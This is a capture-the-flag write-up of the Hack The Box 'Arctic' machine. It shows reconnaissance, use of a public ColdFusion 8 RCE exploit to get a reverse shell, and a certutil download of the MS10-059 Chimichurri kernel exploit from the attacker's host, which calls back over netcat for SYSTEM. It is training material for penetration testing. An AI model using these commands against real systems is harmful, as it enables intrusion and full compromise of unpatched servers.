Artic

Reconnaissance:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.11

135/tcp   open  msrpc   Microsoft Windows RPC

8500/tcp  open  fmtp?

49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.11   

All 1000 scanned ports on 10.10.10.11 are in ignored states.

nmap found three open TCP ports, RPC (135, 49154) and something on (8500):

Protocol Enumeration: TCP 8500

Let’s do some more enumeration on port 8500. Visit the URL in the browser.

http://10.10.10.11:8500/

It takes about 30 seconds to perform every request! So we’ll try and see if we could perform our enumeration manually before we resort to automated tools. When you visit the cfdocs/ directory, you’ll find an administrator/ directory.

http://10.10.10.11:8500/CFIDE/ http://10.10.10.11:8500/CFIDE/administrator/

When you click on the administrator/ directory, you’re presented with an admin login page. Default/common credentials didn’t work and a password cracker would take an unbelievably long time (30s per request), so we’ll have to see if the application itself is vulnerable to any exploits.

Vulnerabilities: The login page does tell us that it’s using Adobe ColdFusion 8, which is a web development application platform. We’ll use the platform name to see if it contains any vulnerabilities.

┌──(kali💀kali)-[~]
└─$ searchsploit --id adobe coldfusion 

┌──(kali💀kali)-[~]
└─$ searchsploit coldfusion 8
Adobe ColdFusion - Directory Traversal                      | 14641
Adobe ColdFusion - Directory Traversal (Metasploit)         | 16985

Adobe ColdFusion 8 - Remote Command Execution (RCE)         | 50057

Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm'  | 33170
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authentic | 33167
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowi | 33169
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/se | 33168

The application is using version 8, so we only care about exploits relevant to this specific version.

Exploiting CVE-2009-2265 – Arbitrary File Upload

Since the RCE looks the most appealing and is specific to the version running on the target, I decided to grab a copy of that into my working directory to have a closer look.

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 50057.py

Now that the exploit is in the working directory, I checked what the script is doing and if there are any changes that need to be made.

Here the script has LHOST, LPORT, RHOST, and RPORT, which will need to be edited. It also shows that it crafts a java (JSP) payload and uses a post request to upload it onto the webserver. Above that, it shows the definition “execute payload” and “listener connection” to define where the script navigates to execute the payload, and to catch the shell using netcat.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 4444  

┌──(kali💀kali)-[~/Desktop]
└─$ python3 ./50057.py

C:\ColdFusion8\runtime\bin>whoami 
whoami
arctic\tolis

C:\Users\tolis\Desktop>type user.txt
type user.txt
f843ea--------------------------------

Privilege Escalation

Starting with systeminfo to get an idea of the OS running on the victim as well as the architecture and installed hotfixes.

C:\> systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A

From the output, it was quickly observed that this is a fairly old version of Windows Server running on an x64 arch and has NO hotfixes installed.

When you find an old OS and no hotfixes installed, immediately you should be thinking kernel exploit.

Since the OS is quite old, there are likely many kernel exploits that can be used to elevate privileges; however, before going down that route, I like to enumerate further to ensure I do not miss a learning opportunity as a kernel exploit may not be the intended method by the machine creator.

On an exam like OSCP, try the kernel exploit first, but for learning purposes, save it for last. After gathering information about the target host, I checked the current user tolis’ privileges, like so:

C:\>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Windows-Exploit-Suggester:

Given the complete lack of hotfixes, this is likely vulnerable to an exploit. I can use the sysinfo results to run Windows Exploit Suggester. I’ll clone the repo into /opt:

Let’s find out more about the system.

C:\>systeminfo

Copy the output of the systeminfo command and save it in a file. We’ll use Windows Exploit Suggester to identify any missing patches that could potentially allow us to escalate privileges.

┌──(kali💀kali)-[~/Desktop]
└─$ nano sysinfo.txt

I’ll create a database:

┌──(kali💀kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo ./windows-exploit-suggester.py --update

Now I can run that against the sysinfo output:

┌──(kali💀kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo ./windows-exploit-suggester.py --database 2023-12-14-mssb.xls --systeminfo /home/kali/Desktop/sysinfo.txt

[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Elevating Privileges to SYSTEM – Kernel Exploit (MS10-059)

I did some googling around for exploit code and found this GitHub from egre55 that included an exploit for MS10-059. I was particularly drawn to the fact that this binary requires an IP and port to connect to. Many of the exploits will start a new cmd as SYSTEM, which is nice if you are standing at the computer, but not so useful from a remote shell.

windows-kernel-exploits/MS10-059: Chimichurri at master · egre55/windows-kernel-exploitsGitHub

GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub

┌──(kali💀kali)-[~/Desktop]
└─$ python3 -m http.server 80

C:\Users\tolis\Downloads>certutil -f -split -urlcache "http://10.10.14.2/Chimichurri.exe"

Now I start a nc listener, and run it:

┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap nc -nvlp 443

C:\Users\tolis\Downloads>.\Chimichurri.exe 10.10.14.2 443

┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap nc -nvlp 443
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49857
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Downloads>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>type root.txt
type root.txt

PreviousGranny NextGrandpa

Last updated 2 years ago